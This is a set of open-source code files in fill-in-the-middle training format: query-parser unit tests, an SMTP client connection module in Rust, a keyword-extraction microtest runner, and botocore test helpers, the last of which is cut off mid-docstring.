self.assertIsInstance(value, float) self.assertEqual(value, 2.0) def test_parse_untyped_field(self): value = ModelFixture1._parse('field_nine', '2') self.assertEqual(value, '2') class QueryParseTest(unittest.TestCase): def pqp(self, part): return dbcore.queryparse.parse_query_part( part, {'year': dbcore.query.NumericQuery}, {':': dbcore.query.RegexpQuery}, )[:-1] # remove the negate flag def test_one_basic_term(self): q = 'test' r = (None, 'test', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_one_keyed_term(self): q = 'test:val' r = ('test', 'val', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_colon_at_end(self): q = 'test:' r = ('test', '', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_one_basic_regexp(self): q = r':regexp' r = (None, 'regexp', dbcore.query.RegexpQuery) self.assertEqual(self.pqp(q), r) def test_keyed_regexp(self): q = r'test::regexp' r = ('test', 'regexp', dbcore.query.RegexpQuery) self.assertEqual(self.pqp(q), r) def test_escaped_colon(self): q = r'test\:val' r = (None, 'test:val', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_escaped_colon_in_regexp(self): q = r':test\:regexp' r = (None, 'test:regexp', dbcore.query.RegexpQuery) self.assertEqual(self.pqp(q), r) def test_single_year(self): q = 'year:1999' r = ('year', '1999', dbcore.query.NumericQuery) self.assertEqual(self.pqp(q), r) def test_multiple_years(self): q = 'year:1999..2010' r = ('year', '1999..2010', dbcore.query.NumericQuery) self.assertEqual(self.pqp(q), r) def test_empty_query_part(self):<|fim▁hole|> class QueryFromStringsTest(unittest.TestCase): def qfs(self, strings): return dbcore.queryparse.query_from_strings( dbcore.query.AndQuery, ModelFixture1, {':': dbcore.query.RegexpQuery}, strings, ) def test_zero_parts(self): q = self.qfs([]) self.assertIsInstance(q, 
dbcore.query.AndQuery) self.assertEqual(len(q.subqueries), 1) self.assertIsInstance(q.subqueries[0], dbcore.query.TrueQuery) def test_two_parts(self): q = self.qfs(['foo', 'bar:baz']) self.assertIsInstance(q, dbcore.query.AndQuery) self.assertEqual(len(q.subqueries), 2) self.assertIsInstance(q.subqueries[0], dbcore.query.AnyFieldQuery) self.assertIsInstance(q.subqueries[1], dbcore.query.SubstringQuery) def test_parse_fixed_type_query(self): q = self.qfs(['field_one:2..3']) self.assertIsInstance(q.subqueries[0], dbcore.query.NumericQuery) def test_parse_flex_type_query(self): q = self.qfs(['some_float_field:2..3']) self.assertIsInstance(q.subqueries[0], dbcore.query.NumericQuery) def test_empty_query_part(self): q = self.qfs(['']) self.assertIsInstance(q.subqueries[0], dbcore.query.TrueQuery) def test_parse_named_query(self): q = self.qfs(['some_query:foo']) self.assertIsInstance(q.subqueries[0], QueryFixture) class SortFromStringsTest(unittest.TestCase): def sfs(self, strings): return dbcore.queryparse.sort_from_strings( ModelFixture1, strings, ) def test_zero_parts(self): s = self.sfs([]) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(s, dbcore.query.NullSort()) def test_one_parts(self): s = self.sfs(['field+']) self.assertIsInstance(s, dbcore.query.Sort) def test_two_parts(self): s = self.sfs(['field+', 'another_field-']) self.assertIsInstance(s, dbcore.query.MultipleSort) self.assertEqual(len(s.sorts), 2) def test_fixed_field_sort(self): s = self.sfs(['field_one+']) self.assertIsInstance(s, dbcore.query.FixedFieldSort) self.assertEqual(s, dbcore.query.FixedFieldSort('field_one')) def test_flex_field_sort(self): s = self.sfs(['flex_field+']) self.assertIsInstance(s, dbcore.query.SlowFieldSort) self.assertEqual(s, dbcore.query.SlowFieldSort('flex_field')) def test_special_sort(self): s = self.sfs(['some_sort+']) self.assertIsInstance(s, SortFixture) class ParseSortedQueryTest(unittest.TestCase): def psq(self, parts): return dbcore.parse_sorted_query( ModelFixture1, parts.split(), ) def test_and_query(self): q, s = self.psq('foo bar') self.assertIsInstance(q, dbcore.query.AndQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 2) def test_or_query(self): q, s = self.psq('foo , bar') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 2) def test_no_space_before_comma_or_query(self): q, s = self.psq('foo, bar') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 2) def test_no_spaces_or_query(self): q, s = self.psq('foo,bar') self.assertIsInstance(q, dbcore.query.AndQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 1) def test_trailing_comma_or_query(self): q, s = self.psq('foo , bar ,') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 3) def test_leading_comma_or_query(self): q, s = self.psq(', foo , bar') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 3) def test_only_direction(self): q, s = self.psq('-') self.assertIsInstance(q, dbcore.query.AndQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 1) class ResultsIteratorTest(unittest.TestCase): def setUp(self): self.db = DatabaseFixture1(':memory:') model = ModelFixture1() model['foo'] = 
'baz' model.add(self.db) model = ModelFixture1() model['foo'] = 'bar' model.add(self.db) def tearDown(self): self.db._connection().close() def test_iterate_once(self): objs = self.db._fetch(ModelFixture1) self.assertEqual(len(list(objs)), 2) def test_iterate_twice(self): objs = self.db._fetch(ModelFixture1) list(objs) self.assertEqual(len(list(objs)), 2) def test_concurrent_iterators(self): results = self.db._fetch(ModelFixture1) it1 = iter(results) it2 = iter(results) next(it1) list(it2) self.assertEqual(len(list(it1)), 1) def test_slow_query(self): q = dbcore.query.SubstringQuery('foo', 'ba', False) objs = self.db._fetch(ModelFixture1, q) self.assertEqual(len(list(objs)), 2) def test_slow_query_negative(self): q = dbcore.query.SubstringQuery('foo', 'qux', False) objs = self.db._fetch(ModelFixture1, q) self.assertEqual(len(list(objs)), 0) def test_iterate_slow_sort(self): s = dbcore.query.SlowFieldSort('foo') res = self.db._fetch(ModelFixture1, sort=s) objs = list(res) self.assertEqual(objs[0].foo, 'bar') self.assertEqual(objs[1].foo, 'baz') def test_unsorted_subscript(self): objs = self.db._fetch(ModelFixture1) self.assertEqual(objs[0].foo, 'baz') self.assertEqual(objs[1].foo, 'bar') def test_slow_sort_subscript(self): s = dbcore.query.SlowFieldSort('foo') objs = self.db._fetch(ModelFixture1, sort=s) self.assertEqual(objs[0].foo, 'bar') self.assertEqual(objs[1].foo, 'baz') def test_length(self): objs = self.db._fetch(ModelFixture1) self.assertEqual(len(objs), 2) def test_out_of_range(self): objs = self.db._fetch(ModelFixture1) with self.assertRaises(IndexError): objs[100] def test_no_results(self): self.assertIsNone(self.db._fetch( ModelFixture1, dbcore.query.FalseQuery()).get()) def suite(): return unittest.TestLoader().loadTestsFromName(__name__) if __name__ == '__main__': unittest.main(defaultTest='suite')<|fim▁end|>
q = '' r = (None, '', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r)
<|file_name|>dnsaaaarecordnotfoundexception.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*- from ...errors.httpbadrequestexception import HttpBadRequestException import saklient # module saklient.cloud.errors.dnsaaaarecordnotfoundexception<|fim▁hole|> ## @param {int} status # @param {str} code=None # @param {str} message="" def __init__(self, status, code=None, message=""): super(DnsAaaaRecordNotFoundException, self).__init__(status, code, "不適切な要求です。対応するAAAAレコードが見つかりません。" if message is None or message == "" else message)<|fim▁end|>
class DnsAaaaRecordNotFoundException(HttpBadRequestException): ## Invalid request: the corresponding AAAA record was not found.
<|file_name|>bibclassify_microtests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """Module for running microtests on how well the extraction works - this module is STANDALONE safe""" import ConfigParser import glob import traceback import codecs import bibclassify_config as bconfig import bibclassify_engine as engine log = bconfig.get_logger("bibclassify.microtest") def run(glob_patterns, verbose=20, plevel = 1 ): """Execute microtests""" if verbose is not None: log.setLevel(int(verbose)) results = {} for pattern in glob_patterns: log.info("Looking for microtests: %s" % pattern) for cfgfile in glob.glob(pattern): log.debug("processing: %s" % (cfgfile)) try: test_cases = load_microtest_definition(cfgfile) run_microtest_suite(test_cases, results=results, plevel=plevel) except Exception, msg: log.error('Error running microtest: %s' % cfgfile) log.error(msg) log.error(traceback.format_exc()) summarize_results(results, plevel) def run_microtest_suite(test_cases, results={}, plevel=1): """Runs all tests from the test_case @var test_cases: microtest definitions @keyword results: dict, where results are cummulated @keyword plevel: int [0..1], performance level, results below the plevel are considered unsuccessful @return: nothing """ config = {} if 'config' in test_cases: config = test_cases['config'] del(test_cases['config']) if 'taxonomy' not in config: config['taxonomy'] = ['HEP'] for test_name in sorted(test_cases.keys()): test = test_cases[test_name] try: log.debug('section: %s' % test_name) phrase = test['phrase'][0] (skw, ckw, akw, acr) = engine.get_keywords_from_text(test['phrase'], config['taxonomy'][0], output_mode="raw") details = analyze_results(test, (skw, ckw) ) if details["plevel"] < plevel: log.error("\n" + format_test_case(test)) log.error("results\n" + format_details(details)) else: log.info("Success for section: %s" % (test_name)) log.info("\n" + format_test_case(test)) if plevel != 1: log.info("results\n" + format_details(details)) results.setdefault(test_name, []) results[test_name].append(details) except Exception, msg: log.error('Operational error executing section: %s' % test_name) #log.error(msg) log.error(traceback.format_exc()) def summarize_results(results, plevel): total = 0 success = 0 for k,v in results.items(): total += len(v) success += len(filter(lambda x: x["plevel"] >= plevel, v)) log.info("Total number of micro-tests run: %s" % total) log.info("Success/failure: %d/%d" % (success, total-success)) def format_details(details): plevel = details["plevel"] details["plevel"] = [plevel] out = format_test_case(details) details["plevel"] = plevel return out def format_test_case(test_case): padding = 13 keys = ["phrase", "expected", "unwanted"] out = ["" for x in range(len(keys))] out2 = [] for key in test_case.keys(): phrase = "\n".join(map(lambda x: (" " * (padding + 1) ) + str(x), test_case[key])) if key in keys: out[keys.index(key)] = "%s=%s" % (key.rjust(padding-1), phrase[padding:]) else: out2.append("%s=%s" % (key.rjust(padding-1), phrase[padding:])) if filter(len, out) and filter(len, out2): return "%s\n%s" % ("\n".join(filter(len, out)), "\n".join(out2)) else: return "%s%s" % ("\n".join(filter(len, out)), "\n".join(out2)) def analyze_results(test_case, results): skw = results[0] ckw = results[1] details = {"correct" : [], "incorrect": [], "plevel" : 0} responses_total = len(skw) + len(ckw) expected_total = len(test_case["expected"]) correct_responses = 0 incorrect_responses = 0 for result_set in (skw, ckw): for r in result_set: try: val = r[0].output() 
except: val = r.output() if r in test_case["expected"]: correct_responses += 1 details["correct"].append(val) else: incorrect_responses += 1 details["incorrect"].append(val) details["plevel"] = float((responses_total + expected_total) - incorrect_responses) / (responses_total + expected_total) return details def load_microtest_definition(cfgfile, **kwargs): """Loads data from the microtest definition file { section-1: phrase: [ some-string] expected: [some, string] unwanted: [some-string] section-2: ..... } """ config = {} cfg = ConfigParser.ConfigParser() fo = codecs.open(cfgfile, 'r', 'utf-8') cfg.readfp(fo, filename=cfgfile) for s in cfg.sections(): if s in config: log.error('two sections with the same name') config[s] = {} for k, v in cfg.items(s): if "\n" in v: v = filter(len, v.splitlines()) else: v = [v.strip()] if k not in config[s]: config[s][k] = [] config[s][k] += v fo.close() return config if __name__ == "__main__": import os, sys test_paths = [] if len(sys.argv) > 1 and sys.argv[1] == "demo": test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "bibclassify/microtest*.cfg"))) test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../../etc/bibclassify/microtest*.cfg"))) run(test_paths)<|fim▁hole|> test_paths.append(p) else: # try to detect if we shall prepend rootdir first = p.split(os.path.sep)[0] if os.path.exists(first): #probably relative path test_paths.append(p) elif os.path.exists(os.path.join(bconfig.CFG_PREFIX, first)): #relative to root test_paths.append(os.path.join(bconfig.CFG_PREFIX, p)) log.warning('Resolving relative path %s -> %s' % (p, test_paths[-1])) else: raise Exception('Please check the glob pattern: %s\n\ it seems to be a relative path, but not relative to the script, nor to the invenio rootdir' % p) run(test_paths) else: print 'Usage: %s glob_pattern [glob_pattern...]\nExample: %s %s/etc/bibclassify/microtest*.cfg' % (sys.argv[0], sys.argv[0], bconfig.CFG_PREFIX)<|fim▁end|>
elif (len(sys.argv) > 1): for p in sys.argv[1:]: if p[0] == os.path.sep: # absolute path
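# A sketch of the INI layout load_microtest_definition expects, inferred from
# its docstring; the section name and phrases below are invented.
#
# [test-001]
# phrase: We study quark-gluon plasma formation.
# expected: quark
#     gluon
# unwanted: plasma television
#
# Parsing a file like this yields roughly:
# {'test-001': {'phrase': ['We study quark-gluon plasma formation.'],
#               'expected': ['quark', 'gluon'],
#               'unwanted': ['plasma television']}}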
<|file_name|>connection.rs<|end_file_name|><|fim▁begin|>use std::{ fmt::Display, io::{self, BufRead, BufReader, Write}, net::ToSocketAddrs, time::Duration, }; use super::{ClientCodec, NetworkStream, TlsParameters}; use crate::{ address::Envelope, transport::smtp::{ authentication::{Credentials, Mechanism}, commands::*, error, error::Error, extension::{ClientId, Extension, MailBodyParameter, MailParameter, ServerInfo}, response::{parse_response, Response}, }, }; #[cfg(feature = "tracing")] use super::escape_crlf; macro_rules! try_smtp ( ($err: expr, $client: ident) => ({ match $err { Ok(val) => val, Err(err) => { $client.abort(); return Err(From::from(err)) }, } }) ); /// Structure that implements the SMTP client pub struct SmtpConnection { /// TCP stream between client and server /// Value is None before connection stream: BufReader<NetworkStream>, /// Panic state panic: bool, /// Information about the server server_info: ServerInfo, } impl SmtpConnection { pub fn server_info(&self) -> &ServerInfo { &self.server_info } // FIXME add simple connect and rename this one /// Connects to the configured server /// /// Sends EHLO and parses server information pub fn connect<A: ToSocketAddrs>( server: A, timeout: Option<Duration>, hello_name: &ClientId, tls_parameters: Option<&TlsParameters>, ) -> Result<SmtpConnection, Error> { let stream = NetworkStream::connect(server, timeout, tls_parameters)?; let stream = BufReader::new(stream); let mut conn = SmtpConnection { stream, panic: false, server_info: ServerInfo::default(), }; conn.set_timeout(timeout).map_err(error::network)?; // TODO log let _response = conn.read_response()?; conn.ehlo(hello_name)?; // Print server information #[cfg(feature = "tracing")] tracing::debug!("server {}", conn.server_info); Ok(conn) } <|fim▁hole|> // Internationalization handling // // * 8BITMIME: https://tools.ietf.org/html/rfc6152 // * SMTPUTF8: https://tools.ietf.org/html/rfc653 // Check for non-ascii addresses and use the SMTPUTF8 option if any. 
if envelope.has_non_ascii_addresses() { if !self.server_info().supports_feature(Extension::SmtpUtfEight) { // don't try to send non-ascii addresses (per RFC) return Err(error::client( "Envelope contains non-ascii chars but server does not support SMTPUTF8", )); } mail_options.push(MailParameter::SmtpUtfEight); } // Check for non-ascii content in message if !email.is_ascii() { if !self.server_info().supports_feature(Extension::EightBitMime) { return Err(error::client( "Message contains non-ascii chars but server does not support 8BITMIME", )); } mail_options.push(MailParameter::Body(MailBodyParameter::EightBitMime)); } try_smtp!( self.command(Mail::new(envelope.from().cloned(), mail_options)), self ); // Recipient for to_address in envelope.to() { try_smtp!(self.command(Rcpt::new(to_address.clone(), vec![])), self); } // Data try_smtp!(self.command(Data), self); // Message content let result = try_smtp!(self.message(email), self); Ok(result) } pub fn has_broken(&self) -> bool { self.panic } pub fn can_starttls(&self) -> bool { !self.is_encrypted() && self.server_info.supports_feature(Extension::StartTls) } #[allow(unused_variables)] pub fn starttls( &mut self, tls_parameters: &TlsParameters, hello_name: &ClientId, ) -> Result<(), Error> { if self.server_info.supports_feature(Extension::StartTls) { #[cfg(any(feature = "native-tls", feature = "rustls-tls"))] { try_smtp!(self.command(Starttls), self); self.stream.get_mut().upgrade_tls(tls_parameters)?; #[cfg(feature = "tracing")] tracing::debug!("connection encrypted"); // Send EHLO again try_smtp!(self.ehlo(hello_name), self); Ok(()) } #[cfg(not(any(feature = "native-tls", feature = "rustls-tls")))] // This should never happen as `Tls` can only be created // when a TLS library is enabled unreachable!("TLS support required but not supported"); } else { Err(error::client("STARTTLS is not supported on this server")) } } /// Send EHLO and update server info fn ehlo(&mut self, hello_name: &ClientId) -> Result<(), Error> { let ehlo_response = try_smtp!(self.command(Ehlo::new(hello_name.clone())), self); self.server_info = try_smtp!(ServerInfo::from_response(&ehlo_response), self); Ok(()) } pub fn quit(&mut self) -> Result<Response, Error> { Ok(try_smtp!(self.command(Quit), self)) } pub fn abort(&mut self) { // Only try to quit if we are not already broken if !self.panic { self.panic = true; let _ = self.command(Quit); } } /// Sets the underlying stream pub fn set_stream(&mut self, stream: NetworkStream) { self.stream = BufReader::new(stream); } /// Tells if the underlying stream is currently encrypted pub fn is_encrypted(&self) -> bool { self.stream.get_ref().is_encrypted() } /// Set timeout pub fn set_timeout(&mut self, duration: Option<Duration>) -> io::Result<()> { self.stream.get_mut().set_read_timeout(duration)?; self.stream.get_mut().set_write_timeout(duration) } /// Checks if the server is connected using the NOOP SMTP command pub fn test_connected(&mut self) -> bool { self.command(Noop).is_ok() } /// Sends an AUTH command with the given mechanism, and handles challenge if needed pub fn auth( &mut self, mechanisms: &[Mechanism], credentials: &Credentials, ) -> Result<Response, Error> { let mechanism = self .server_info .get_auth_mechanism(mechanisms) .ok_or_else(|| error::client("No compatible authentication mechanism was found"))?; // Limit challenges to avoid blocking let mut challenges = 10; let mut response = self.command(Auth::new(mechanism, credentials.clone(), None)?)?; while challenges > 0 && response.has_code(334) { challenges -= 1; 
response = try_smtp!( self.command(Auth::new_from_response( mechanism, credentials.clone(), &response, )?), self ); } if challenges == 0 { Err(error::response("Unexpected number of challenges")) } else { Ok(response) } } /// Sends the message content pub fn message(&mut self, message: &[u8]) -> Result<Response, Error> { let mut out_buf: Vec<u8> = vec![]; let mut codec = ClientCodec::new(); codec.encode(message, &mut out_buf); self.write(out_buf.as_slice())?; self.write(b"\r\n.\r\n")?; self.read_response() } /// Sends an SMTP command pub fn command<C: Display>(&mut self, command: C) -> Result<Response, Error> { self.write(command.to_string().as_bytes())?; self.read_response() } /// Writes a string to the server fn write(&mut self, string: &[u8]) -> Result<(), Error> { self.stream .get_mut() .write_all(string) .map_err(error::network)?; self.stream.get_mut().flush().map_err(error::network)?; #[cfg(feature = "tracing")] tracing::debug!("Wrote: {}", escape_crlf(&String::from_utf8_lossy(string))); Ok(()) } /// Gets the SMTP response pub fn read_response(&mut self) -> Result<Response, Error> { let mut buffer = String::with_capacity(100); while self.stream.read_line(&mut buffer).map_err(error::network)? > 0 { #[cfg(feature = "tracing")] tracing::debug!("<< {}", escape_crlf(&buffer)); match parse_response(&buffer) { Ok((_remaining, response)) => { return if response.is_positive() { Ok(response) } else { Err(error::code(response.code())) }; } Err(nom::Err::Failure(e)) => { return Err(error::response(e.to_string())); } Err(nom::Err::Incomplete(_)) => { /* read more */ } Err(nom::Err::Error(e)) => { return Err(error::response(e.to_string())); } } } Err(error::response("incomplete response")) } }<|fim▁end|>
pub fn send(&mut self, envelope: &Envelope, email: &[u8]) -> Result<Response, Error> { // Mail let mut mail_options = vec![];
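# For comparison only: the same EHLO -> STARTTLS -> AUTH -> MAIL/RCPT/DATA
# sequence that SmtpConnection implements above, sketched with Python's
# standard smtplib. Host, port, credentials and addresses are placeholders.
#
# import smtplib
# with smtplib.SMTP('mail.example.com', 587, timeout=60) as conn:
#     conn.ehlo('client.example.com')
#     conn.starttls()  # smtplib drops the cached EHLO, so login() re-sends it
#     conn.login('user', 'password')
#     conn.sendmail('from@example.com', ['to@example.com'], b'...message...')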
<|file_name|>utility.py<|end_file_name|><|fim▁begin|>""" Basic utility functions """ import redislite from .server import RDB_FILE def header(message, width=80): header_message = '## ' + message + ' '<|fim▁hole|> def connect_to_redis(): return redislite.Redis(dbfilename=RDB_FILE)<|fim▁end|>
end_chars = width - (len(message) + 4) header_message += '#'*end_chars print(header_message)
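# Worked example for header() above: '## Results ' is 11 characters, so with
# width=20 the function pads the line with 20 - (7 + 4) = 9 trailing '#'s.
def demo_header(message, width=80):
    # same arithmetic as header(), duplicated so this sketch is standalone
    line = '## ' + message + ' '
    line += '#' * (width - (len(message) + 4))
    return line

assert demo_header('Results', width=20) == '## Results #########'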
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># Copyright 2012-2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. import os import sys import mock import time import random import shutil import contextlib import tempfile import binascii import platform import select import datetime from io import BytesIO from subprocess import Popen, PIPE from dateutil.tz import tzlocal import unittest from nose.tools import assert_equal import botocore.loaders import botocore.session from botocore.awsrequest import AWSResponse from botocore.compat import ( parse_qs, six, urlparse, HAS_CRT ) from botocore import utils from botocore import credentials from botocore.stub import Stubber _LOADER = botocore.loaders.Loader() def skip_unless_has_memory_collection(cls): """Class decorator to skip tests that require memory collection. Any test that uses memory collection (such as the resource leak tests) can decorate their class with skip_unless_has_memory_collection to indicate that if the platform does not support memory collection the tests should be skipped. """ if platform.system() not in ['Darwin', 'Linux']: return unittest.skip('Memory tests only supported on mac/linux.')(cls) return cls def skip_if_windows(reason): """Decorator to skip tests that should not be run on windows. Example usage: @skip_if_windows("Not valid") def test_some_non_windows_stuff(self): self.assertEqual(...) """ def decorator(func): return unittest.skipIf( platform.system() not in ['Darwin', 'Linux'], reason)(func) return decorator def requires_crt(reason=None): if reason is None: reason = "Test requires awscrt to be installed" def decorator(func): return unittest.skipIf(not HAS_CRT, reason)(func) return decorator def random_chars(num_chars): """Returns random hex characters. Useful for creating resources with random names. <|fim▁hole|> def create_session(**kwargs): # Create a Session object. By default, # the _LOADER object is used as the loader # so that we reused the same models across tests. session = botocore.session.Session(**kwargs) session.register_component('data_loader', _LOADER) session.set_config_variable('credentials_file', 'noexist/foo/botocore') return session @contextlib.contextmanager def temporary_file(mode): """This is a cross platform temporary file creation. tempfile.NamedTemporary file on windows creates a secure temp file that can't be read by other processes and can't be opened a second time. For tests, we generally *want* them to be read multiple times. The test fixture writes the temp file contents, the test reads the temp file. """ temporary_directory = tempfile.mkdtemp() basename = 'tmpfile-%s-%s' % (int(time.time()), random.randint(1, 1000)) full_filename = os.path.join(temporary_directory, basename) open(full_filename, 'w').close() try: with open(full_filename, mode) as f: yield f finally: shutil.rmtree(temporary_directory) class BaseEnvVar(unittest.TestCase): def setUp(self): # Automatically patches out os.environ for you # and gives you a self.environ attribute that simulates # the environment. 
Also will automatically restore state # for you in tearDown() self.environ = {} self.environ_patch = mock.patch('os.environ', self.environ) self.environ_patch.start() def tearDown(self): self.environ_patch.stop() class BaseSessionTest(BaseEnvVar): """Base class used to provide credentials. This class can be used as a base class that want to use a real session class but want to be completely isolated from the external environment (including environment variables). This class will also set credential vars so you can make fake requests to services. """ def setUp(self, **environ): super(BaseSessionTest, self).setUp() self.environ['AWS_ACCESS_KEY_ID'] = 'access_key' self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key' self.environ['AWS_CONFIG_FILE'] = 'no-exist-foo' self.environ.update(environ) self.session = create_session() self.session.config_filename = 'no-exist-foo' @skip_unless_has_memory_collection class BaseClientDriverTest(unittest.TestCase): INJECT_DUMMY_CREDS = False def setUp(self): self.driver = ClientDriver() env = None if self.INJECT_DUMMY_CREDS: env = {'AWS_ACCESS_KEY_ID': 'foo', 'AWS_SECRET_ACCESS_KEY': 'bar'} self.driver.start(env=env) def cmd(self, *args): self.driver.cmd(*args) def send_cmd(self, *args): self.driver.send_cmd(*args) def record_memory(self): self.driver.record_memory() @property def memory_samples(self): return self.driver.memory_samples def tearDown(self): self.driver.stop() class ClientDriver(object): CLIENT_SERVER = os.path.join( os.path.dirname(os.path.abspath(__file__)), 'cmd-runner' ) def __init__(self): self._popen = None self.memory_samples = [] def _get_memory_with_ps(self, pid): # It would be better to eventually switch to psutil, # which should allow us to test on windows, but for now # we'll just use ps and run on POSIX platforms. command_list = ['ps', '-p', str(pid), '-o', 'rss'] p = Popen(command_list, stdout=PIPE) stdout = p.communicate()[0] if not p.returncode == 0: raise RuntimeError("Could not retrieve memory") else: # Get the RSS from output that looks like this: # RSS # 4496 return int(stdout.splitlines()[1].split()[0]) * 1024 def record_memory(self): mem = self._get_memory_with_ps(self._popen.pid) self.memory_samples.append(mem) def start(self, env=None): """Start up the command runner process.""" self._popen = Popen([sys.executable, self.CLIENT_SERVER], stdout=PIPE, stdin=PIPE, env=env) def stop(self): """Shutdown the command runner process.""" self.cmd('exit') self._popen.wait() def send_cmd(self, *cmd): """Send a command and return immediately. This is a lower level method than cmd(). This method will instruct the cmd-runner process to execute a command, but this method will immediately return. You will need to use ``is_cmd_finished()`` to check that the command is finished. This method is useful if you want to record attributes about the process while an operation is occurring. For example, if you want to instruct the cmd-runner process to upload a 1GB file to S3 and you'd like to record the memory during the upload process, you can use send_cmd() instead of cmd(). """ cmd_str = ' '.join(cmd) + '\n' cmd_bytes = cmd_str.encode('utf-8') self._popen.stdin.write(cmd_bytes) self._popen.stdin.flush() def is_cmd_finished(self): rlist = [self._popen.stdout.fileno()] result = select.select(rlist, [], [], 0.01) if result[0]: return True return False def cmd(self, *cmd): """Send a command and block until it finishes. This method will send a command to the cmd-runner process to run. 
It will block until the cmd-runner process is finished executing the command and sends back a status response. """ self.send_cmd(*cmd) result = self._popen.stdout.readline().strip() if result != b'OK': raise RuntimeError( "Error from command '%s': %s" % (cmd, result)) # This is added to this file because it's used in both # the functional and unit tests for cred refresh. class IntegerRefresher(credentials.RefreshableCredentials): """Refreshable credentials to help with testing. This class makes testing refreshable credentials easier. It has the following functionality: * A counter, self.refresh_counter, to indicate how many times refresh was called. * A way to specify how many seconds to make credentials valid. * Configurable advisory/mandatory refresh. * An easy way to check consistency. Each time creds are refreshed, all the cred values are set to the next incrementing integer. Frozen credentials should always have this value. """ _advisory_refresh_timeout = 2 _mandatory_refresh_timeout = 1 _credentials_expire = 3 def __init__(self, creds_last_for=_credentials_expire, advisory_refresh=_advisory_refresh_timeout, mandatory_refresh=_mandatory_refresh_timeout, refresh_function=None): expires_in = ( self._current_datetime() + datetime.timedelta(seconds=creds_last_for)) if refresh_function is None: refresh_function = self._do_refresh super(IntegerRefresher, self).__init__( '0', '0', '0', expires_in, refresh_function, 'INTREFRESH') self.creds_last_for = creds_last_for self.refresh_counter = 0 self._advisory_refresh_timeout = advisory_refresh self._mandatory_refresh_timeout = mandatory_refresh def _do_refresh(self): self.refresh_counter += 1 current = int(self._access_key) next_id = str(current + 1) return { 'access_key': next_id, 'secret_key': next_id, 'token': next_id, 'expiry_time': self._seconds_later(self.creds_last_for), } def _seconds_later(self, num_seconds): # We need to guarantee at *least* num_seconds. # Because this doesn't handle subsecond precision # we'll round up to the next second. num_seconds += 1 t = self._current_datetime() + datetime.timedelta(seconds=num_seconds) return self._to_timestamp(t) def _to_timestamp(self, datetime_obj): obj = utils.parse_to_aware_datetime(datetime_obj) return obj.strftime('%Y-%m-%dT%H:%M:%SZ') def _current_timestamp(self): return self._to_timestamp(self._current_datetime()) def _current_datetime(self): return datetime.datetime.now(tzlocal()) def _urlparse(url): if isinstance(url, six.binary_type): # Not really necessary, but it helps to reduce noise on Python 2.x url = url.decode('utf8') return urlparse(url) def assert_url_equal(url1, url2): parts1 = _urlparse(url1) parts2 = _urlparse(url2) # Because the query string ordering isn't relevant, we have to parse # every single part manually and then handle the query string. assert_equal(parts1.scheme, parts2.scheme) assert_equal(parts1.netloc, parts2.netloc) assert_equal(parts1.path, parts2.path) assert_equal(parts1.params, parts2.params) assert_equal(parts1.fragment, parts2.fragment) assert_equal(parts1.username, parts2.username) assert_equal(parts1.password, parts2.password) assert_equal(parts1.hostname, parts2.hostname) assert_equal(parts1.port, parts2.port) assert_equal(parse_qs(parts1.query), parse_qs(parts2.query)) class HTTPStubberException(Exception): pass class RawResponse(BytesIO): # TODO: There's a few objects similar to this in various tests, let's # try and consolidate to this one in a future commit. 
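    # stream() below drains the underlying BytesIO with successive read()
    # calls, yielding each non-empty chunk until read() returns b''. With no
    # size argument read() returns the whole remaining buffer, so in practice
    # it yields a single chunk. A hypothetical consumer:
    #
    #     raw = RawResponse(b'payload')
    #     body = b''.join(raw.stream())   # -> b'payload'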
def stream(self, **kwargs): contents = self.read() while contents: yield contents contents = self.read() class BaseHTTPStubber(object): def __init__(self, obj_with_event_emitter, strict=True): self.reset() self._strict = strict self._obj_with_event_emitter = obj_with_event_emitter def reset(self): self.requests = [] self.responses = [] def add_response(self, url='https://example.com', status=200, headers=None, body=b''): if headers is None: headers = {} raw = RawResponse(body) response = AWSResponse(url, status, headers, raw) self.responses.append(response) @property def _events(self): raise NotImplementedError('_events') def start(self): self._events.register('before-send', self) def stop(self): self._events.unregister('before-send', self) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_value, traceback): self.stop() def __call__(self, request, **kwargs): self.requests.append(request) if self.responses: response = self.responses.pop(0) if isinstance(response, Exception): raise response else: return response elif self._strict: raise HTTPStubberException('Insufficient responses') else: return None class ClientHTTPStubber(BaseHTTPStubber): @property def _events(self): return self._obj_with_event_emitter.meta.events class SessionHTTPStubber(BaseHTTPStubber): @property def _events(self): return self._obj_with_event_emitter.get_component('event_emitter') class ConsistencyWaiterException(Exception): pass class ConsistencyWaiter(object): """ A waiter class for some check to reach a consistent state. :type min_successes: int :param min_successes: The minimum number of successful check calls to treat the check as stable. Default of 1 success. :type max_attempts: int :param min_successes: The maximum number of times to attempt calling the check. Default of 20 attempts. :type delay: int :param delay: The number of seconds to 